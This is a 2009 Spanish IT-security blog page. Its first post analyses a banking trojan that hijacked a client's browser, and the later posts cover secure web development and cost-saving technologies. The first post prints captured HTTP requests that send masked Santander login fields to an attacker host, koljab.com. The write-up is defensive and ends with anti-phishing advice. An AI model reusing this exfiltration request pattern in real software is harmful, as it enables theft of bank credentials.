AVISO: Nos hemos integrado con Facebook y Twitter. Ahora, podrás decir si te gusta o no uno de nuestros artículos con tu usuario de la red social. También podrás difundir los artículos que más te gusten a través de cualquier medio. Ayúdanos a que los artículos sean más interesantes dándonos tu opinión. Gracias.

jueves, 22 de octubre de 2009

Phising, cada vez más profesional.

El tema del phising no es nada nuevo en la sociedad. A través de la televisión, la radio o los periódicos nos han llegado noticias relacionadas con ataques de phising. Para aquellos que son saben lo que es, definimos el phising como el ataque que tiene como objetivo robar las credenciales de acceso (principalmente a cuentas bancarias) haciendose pasar por el proveedor legítimo. Las técnicas más básicas utilizan el teléfono para hacerse pasar por otra persona y así obtener la información que necesitan, pero gracias a Internet, las técnicas se han refinado mucho.
Hace un par de días, un cliente nos llamó porque creía que estaba siendo víctima de un ataque de este tipo. Tras investigar el sistema, encontramos que a través del Internet Explorer había asociado un proceso que servía a los atacantes para efectuar sus procesos de Phising. Lo que llamó la atención al cliente es que al acceder a su cuenta bancaria en el Banco Santander, y tras introducir sus claves, la página le solicitaba las claves de firma. Este mismo comportamiento se daba también cuando accedía a otro banco (la Caixa).
Analizando el tráfico que generaba el navegador, pudimos comprobar que aparte del tráfico que se envíaba al banco, había otra conexión que envíaba información a otro sitio. A continuación podemos ver el hilo de paquetes (omitimos aquella información que es sensible):

+++GET 13+++

GET /?10814294bed415c97=D2380743D36432D5DB085310F9267A520E3F8DEC&74040f148da587118=4623&35ce427f962c12483bd=24&8652321f8fa87c239bd=Nw34jR2nNFIBcuFy8ULA4FlXTsJaFo4Dw==&647cb65bf7aebb3f8b= HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)
Host: koljab.com
Connection: keep-alive

+++RESP 13+++

HTTP/1.1 200 OK
Server: nginx/0.8.17
Date: Tue, 20 Oct 2009 18:45:29 GMT
Content-Type: application/octet-stream
X-Powered-By: PHP/5.3.0
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Cache: MISS from loadbalancer
X-Cache-Lookup: MISS from loadbalancer:80
Via: 1.0 loadbalancer (squid)
Connection: close

+++CLOSE 13+++
+++GET 14+++

POST /portal/5ae2d02f136925d1be8546444ca9ace2.php?id=D38073D643D5DB0810F967A520EF8DEC&u=aHR0cHM6Ly9lbXByZXNhcy5ncnVwb3NhbnRhbmRlci5lcy9XZWJFbXByZXNhcy9zZXJ2bGV0L3dlYmVtcHJlc2FzLnNlcnZsZXRzLmxvZ2luLkxvZ2luO2pzZXNzaW9uaWQ9MDAwME5EazJsTEp6WWh3QWF4djFYS3V2Rzl3OjEwOGFlYTBmNw== HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: https://empresas.gruposantander.es/WebEmpresas/servlet/webempresas.servlets.CompressJSP?JSP=nueva_imagen/inicio.jsp&Home=011
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)
Host: koljab.com
Content-Length: 123
Pragma: no-cache
Connection: keep-alive

Browser reload detected...

Posting 123 bytes...

CodigoTipoAcceso=S
grupo=EXXXXXXXXXX
usuario=XXXXXXXXXXXXXX
entidad=XXXX
home=XXXX
password=XXXXXXXXX
sesion.nueva_imagen=S
modo=

+++RESP 14+++

HTTP/1.1 200 OK
Server: nginx/0.8.17
Date: Tue, 20 Oct 2009 18:45:31 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.3.0
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Cache: MISS from loadbalancer
X-Cache-Lookup: MISS from loadbalancer:80
Via: 1.0 loadbalancer (squid)
Connection: close

+++GET 15+++

CONNECT / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)
Proxy-Connection: Keep-Alive
Content-Length: 0
Host:
empresas.gruposantander.es
Pragma: no-cache

+++SSL 15:+++

SSL Pass-Thru: CONNECT https://empresas.gruposantander.es:443/

En esta secuencia vemos como tras haber introducir las credenciales y unas de firma ficticias, el proceso encubierto se las manda a otro servidor a través de un servidor proxy situado en china (koljab.com) (GET 13). Una vez que ya tiene las credenciales y firma, el proceso le pide al servidor atacante que autentique al usuario en la web legítima del banco y le devuelva la información necesaria para acceder (GET 14). Una vez obtenida esa información, el usuario es redirigido a la página web del banco como si nada hubiese pasado.

Lo más curioso de este ataque, es que en la barra de navegación del usuario aparecía en todo momento la dirección y dominio del banco con su correspondiente https.


El único detalle que delataba el ataque, aparte de la rara petición de las claves de firma, era que en el momento en el que se le pedía que intodujesen la firma el candado del Internet Explore que indica que es una página segura, había desaparecido.



Para finalizar este artículo, daremos unos consejos que debemos seguir para evitar el 99,9% de los ataques de phising:
  1. Los bancos NUNCA te solicitan tus claves de firma de operaciones, tarjetas de coordenadas u otras claves de operación.
  2. El acceso a la mayoría de los bancos es siempre bajo SSL (https) con lo que la existencia del candado debe estar en todo momento.
  3. Si alguna vez cambia el proceso de autenticación, antes de introducir más información llame al teléfono de soporte del banco para corroborar la existencia de los cambios.
Al igual que con los virus, en nuestras manos está evitar que este tipo de ataques sigan teniendo tanto éxito.

Como dice un proverbio italiano: "No todos los que tienen un gran cuchillo son verdugos".

domingo, 18 de octubre de 2009

Seguridad en la Web.

A la hora de contratar servicios para el desarrollo de la página web corporativa y/o una intranet, debemos tener en cuenta algunos aspectos primordiales. Actualmente, existes tres tipos de proveedores tecnológicos que ofrecen estos servicios:
  • Agencias de publicidad / diseñadores freelance
  • Empresas de desarrollo informático
  • Amigos / vecinos / parientes /etc, con curso de 100 horas de programación web. ;-)
Debemos tener claro que la página web corporativa de una empresa, en el mercado competitivo en el que nos encontramos, es la carta de presentación de nuestros servicios y productos al mundo, así como una puerta comercial al mundo. Teniendo esto en cuenta, debemos ser cuidadosos con los objetivos que nos debemos plantear para la página.
  • ¿Quiero gestionar el contenido?
  • ¿Quiero solo una tarjeta de presentación?
  • ¿Es importante el aspecto de la web?
  • ¿Necesito vender mis productos a través de la web?
Todas estas preguntas y alguna más, deberían definir que tipo de página web deseo y sobre todo, que tipo de empresa debo elegir para su desarrollo. Si bien, tanto en el primer caso, como en el segundo, los servicios ofrecidos son muy similares (diseño y desarrollo aceptables), en el último caso, muy posiblemente el diseño y/o desarrollo serán algo deficientes. Hasta el momento, no conozco a nadie que aparte de ser un buen diseñador, sea además un buen programador. Como para casi todas las tareas en esta vida, un enfoque multidisciplinar es la mejor opción.

Pero entonces, ¿qué es mejor, una empresa de publicidad o una empresa especializada en desarollo?

En este sentido, dependerá de los colaboradores que se utilice. Las empresas de diseño utilizan a empresas de desarrollo para realizar las tareas de desarrollo que no dominan, y las empresas de desarrollo utilizan diseñadores externos para la parte que no dominan.
Para un neófito, saber si un diseñador le gusta o no, lo tiene más o menos fácil visualizando trabajos anteriores de la persona o empresa y viendo si el estilo se adecua al gusto del cliente.
Sin embargo, un neófito tiene pocos puntos para valorar si un programador es bueno o no. Lo único que se ve es la existencia de una funcionalidad, pero no el cómo está hecho. Y por qué resalto la importancia del cómo está hecho?
Se resalta esta importancia porque en un desarrollo web, aparte de que las cosas funcionen, debe existir unos mínimos de calidad. Por ejemplo, deberíamos saber:
  • Cúal es la titulación de la persona que programa.
  • Cúal es la titulación de la persona que gestiona el proyecto.
  • Tienen en cuenta la seguridad en la programación?
Si bien, la titulación no es algo que determine si el desarrollo va a tener mejor calidad o no (malos profesionales los hay en todos los sectores), si que minimiza los riesgos de que el desarrollo sea malo. También minimiza esos riesgos los conocimientos de la persona que gestiona el proyecto, ya que esto puede completar las carencias del programador.
Pero, aun teniendo esto en cuenta, la mayoría de las veces no se tiene en cuenta la seguridad en el desarrollo. Y esto, que puede parecer una afirmación interesada, va más allá de una mera justificación vacia. Proveedores que ofrecen páginas web a sus clientes, carecen de las medidas adecuadas en el desarrollo. Esto actualmente es una realidad. Visitando el portfolio de algunos de estos proveedores he podido comprobar estas carencias. Es como si al comprar una puerta, te dan un tablero y una cuerdecita para anclarla al marco. Funcionalmente hace su cometido, pero no con la seguridad que debería.

Para finalizar, propongo la siguiente reflexión: ¿Cuanto dinero perdería mi empresa si en la web corporativa:
  1. modificasen la imagen de nuestra empresa por una peyorativa?
  2. infectase con virus a los clientes que entran a conocernos?
  3. robase información de nuestros clientes?
  4. promocionasen desde nuestra web a la competencia?
  5. modificasen los pedidos que nos realizan desde la web?
Espero que después de esta reflexión, haya mucha gente que pueda dormir esta noche.

martes, 13 de octubre de 2009

Formas de ahorrar con la Tecnología

Vamos a dar un pequeño repaso a las tecnologías que pueden ayudar a una empresa a ahorrar. En la coyuntura económica actual, debemos ser más eficientes y la tecnología es una herramienta que nos puede permitir hacerlo.
Las opciones son muy variopintas y dependerá un poco de las características de la empresa para implementar unas u otras, pero seguro que al implementarlas se obtendrá una reducción de costes importante en la empresa.
  1. Facturación Electrónica
    Aquellas empresas que tengan que emitir más de 100 facturas al mes o bien que tengan proyectos con la administración pública, es una opción que deben evaluar. Según algunos estudios, la emisión de una factura y almacenamiento de esta supone 1,46 € por factura, mientras que su emisión en digital ronda los 0,5. Para 100 facturas mensuales, supondría un ahorro de 1152 € anuales. Este tipo de solución tiene un ROI (retorno de inversión) bastante rápido.

  2. Virtualización de entornos
    Una de las tendencias actuales que se está realizando en las grandes empresas es la virtualización de entornos. Pero, ¿qué es eso de la virtualización?. Pongamos como ejemplo que es la utilización al máximo del 100% de los recursos hardware que disponemos. La mayoría de las aplicaciones no consumen el total de los recursos del sistema, con lo que desaprovechamos potencia de procesamiento. Virtualizando entornos, permitimos correr en una mismo hardware distintas aplicaciones sin que interfieran entre si, permitiendo el uso de distintos sistemas operativos (Windows 2003, Linux, ...) en la misma máquina.
    Este tipo de solución permitirá ahorrar recursos a aquellas empresas que dispongan de un parque de servidores mayor a 5 servidores (estimación aproximada).
    Las principales ventajas que tendremos virtualizando entornos serán, entre otras: Reducción costes administrativos, reducción de costes energéticos, reducción en costes hardware, mejora de los procesos de backups y restauración.

  3. Utilización de Firma Digital
    Si bien antes hemos comentado la implementación de la facturación electrónica, también se puede implementar en la empresa la utilización de firma digital para la realización de procesos administrativos. La recepción de partes de trabajo, envío de nóminas, partes de viaje y gastos, y otros procesos administrativos pueden ser implementados de manera automática y segura utilizando la firma digital. De esta manera, el coste asociado a la gestión de la información se reducirá drásticamente, dedicando los recursos administrativos a tareas de mayor valor añadido.

  4. Telefonía IP
    Actualmente, la teléfonía ya ha dejado de ser un monopolio de las grandes operadoras. Si bien, antes para implementar servicios de mensaje de bienvenida, buzones de mensajes o reconocimiento de voz requería la instalación de costosas centralitas en las empresas, actualmente, gracias a la telefonía IP podemos acceder a estos mismos servicios de una manera bastante más económica. También se pueden homogeneizar el acceso a las extensiones de la empresa en caso de tener ubicaciones separadas en distintos edificios.
    Todo esto se realiza gracias a la telefonía IP que utiliza las mismas redes de datos (TCP/IP e Internet) para transmitir la información de voz.
Si bien, las opciones expuestas no son novedosas en el mercado, si lo son todavía en las empresas, dado que su implantación y uso todavía es reducido.

En época de crisis, reducir solo en coste humano y no mejorar la eficiencia de nuestros procesos es como disponer de un coche antiguo que consume mucho y no hacerle las mejoras necesarias para reducir su coste y mantenimiento.